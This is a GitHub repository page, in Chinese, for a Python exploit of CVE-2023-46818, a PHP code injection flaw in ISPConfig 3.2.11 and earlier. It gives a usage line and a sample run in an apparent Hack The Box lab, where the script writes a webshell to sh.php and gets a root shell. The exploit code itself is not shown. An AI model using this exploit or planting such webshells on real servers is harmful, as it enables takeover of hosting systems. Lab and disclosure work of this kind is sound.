ajdumanhug/CVE-2023-46818
GitHub: ajdumanhug/CVE-2023-46818
针对 ISPConfig <= 3.2.11 的 PHP 代码注入漏洞的 Python3 利用脚本,可通过管理员凭证注入并执行任意 PHP 代码。
Stars: 15 | Forks: 2
# CVE-2023-46818 Python 漏洞利用脚本
## 🔥 描述
此 Python 漏洞利用脚本针对 ISPConfig 中 `/admin/language_edit.php` 的 `records` POST 参数的安全漏洞,该参数未经过适当消毒处理。这允许已认证的管理员注入并执行任意 PHP 代码。
## ⚠️ 受影响版本
3.2.11 及更早版本。
## ⚙️ 使用方法
```
python3 CVE-2023-46818.py
```
## 💻 示例运行
```
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...
ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)
ispconfig-shell#
```
## ℹ️ 参考资料
https://seclists.org/fulldisclosure/2023/Dec/2
## ❤️ 致谢
感谢 Egidio Romano 发现此漏洞。
标签:CISA项目, CSRF, CVE-2023-46818, Exploit, HTB, ISPConfig, PHP代码注入, Python3, Webshell, Web安全, 后门, 命令执行, 威胁模拟, 安全漏洞, 蓝队分析, 认证利用